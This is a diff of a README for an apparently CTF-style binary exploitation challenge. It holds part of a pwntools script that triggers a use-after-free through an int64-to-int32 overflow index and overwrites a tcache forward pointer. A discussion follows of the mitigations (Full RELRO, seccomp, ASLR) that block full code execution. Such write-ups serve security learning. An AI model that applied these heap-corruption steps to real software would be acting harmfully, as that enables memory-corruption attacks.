Sigmowski/javaanggara-impossible-pwn-challange/README.md

 p.sendlineafter(b':', b'32')
 p.sendafter(b':', b'BBBB')

-log.info("Step 2: Triggering deallocation to populate tcache...") p.sendlineafter(b'>', b'3')
+log.info("Freeing chunks to populate tcache...") p.sendlineafter(b'>', b'3')
 p.sendlineafter(b':', b'1')
 p.sendlineafter(b'>', b'3')
 p.sendlineafter(b':', b'0')

-log.info("Step 3: Executing UAF via Integer Overflow...")
+log.info("Triggering UAF using the overflow index...")
-# Modifying a freed chunk using the giant index
+# Editing a freed chunk via our giant index primitive
 p.sendlineafter(b'>', b'5')
 p.sendlineafter(b':', BIG_IDX)
-p.sendafter(b':', b'EEFFFFGG') # Corrupting the tcache forward pointer
+p.sendafter(b':', b'EEFFFFGG') # Overwriting the tcache forward pointer

-log.info("Step 4: Verifying memory stability...")
+log.info("Testing heap stability...")
 p.sendlineafter(b'>', b'4')
 p.sendlineafter(b':', BIG_IDX)

-# Inspect output
+# Dump output
 print(p.recvuntil(b'=== EXP', timeout=1).decode('latin-1', errors='ignore'))
 p.close()

-🚧 Current Status & Hardening Barriers
+Current Roadblocks & Mitigation Barriers

-While the UAF and heap read/write primitives are completely stable via BIG_IDX, full weaponization to execute a payload or leak critical library bases is restricted by the following modern mitigation layers implemented in the environment:
+Even though the UAF is fully operational via BIG_IDX, getting code execution or a clean library leak is heavily blocked by how the environment is built:

-    Full RELRO: The Global Offset Table (.got) is mapped as read-only post-relocation.
-Standard Tcache Poisoning targets aimed at hijacking function pointers (like free or malloc) result in an immediate segmentation fault upon write attempts.
+    Full RELRO: The Global Offset Table (.got) is marked Read-Only after the binary loads.
+Standard tcache poisoning tricks aimed at hijacking library functions (like free or malloc) just cause an immediate SigSegV on write.

-    Seccomp Sandbox: System calls such as execve and open are entirely restricted via BPF filters, meaning shellcode execution or standard file descriptors allocation are neutralized.
+    Strict Seccomp: The sandbox entirely disables execve and open.
+Traditional shellcode or simple file reading vectors are dead on arrival.

-    ASLR: Memory addresses are randomized on each execution.
-Because /proc/pid/maps access is restricted by modern Android permission models, out-of-bounds pointer calculations must rely entirely on relative data structure distances within the heap chunk layouts.
+    ASLR & Restrictions: Everything is randomized.
+Since modern Android security blocks access to /proc/pid/maps, any out-of-bounds math or pointer shifting has to be done blindly, relying purely on relative chunk distances inside Jemalloc.

-📝 Conclusion
+Final Thoughts

-This challenge demonstrates that even when a binary is completely locked down with modern compile-time protections (Fortify, Full RELRO, Seccomp), a simple logical flaw in type casting (int64 to int32) can break the application's entire state machine, exposing low-level memory management structures to the user.
+This binary shows a great example of how compile-time defenses (Full RELRO, Seccomp, Fortify) can be completely bypassed at a logic level.
+A simple type mismatch (int64 down to int32) is all it takes to mess with the app's internal state machine and gain control over low-level memory layout.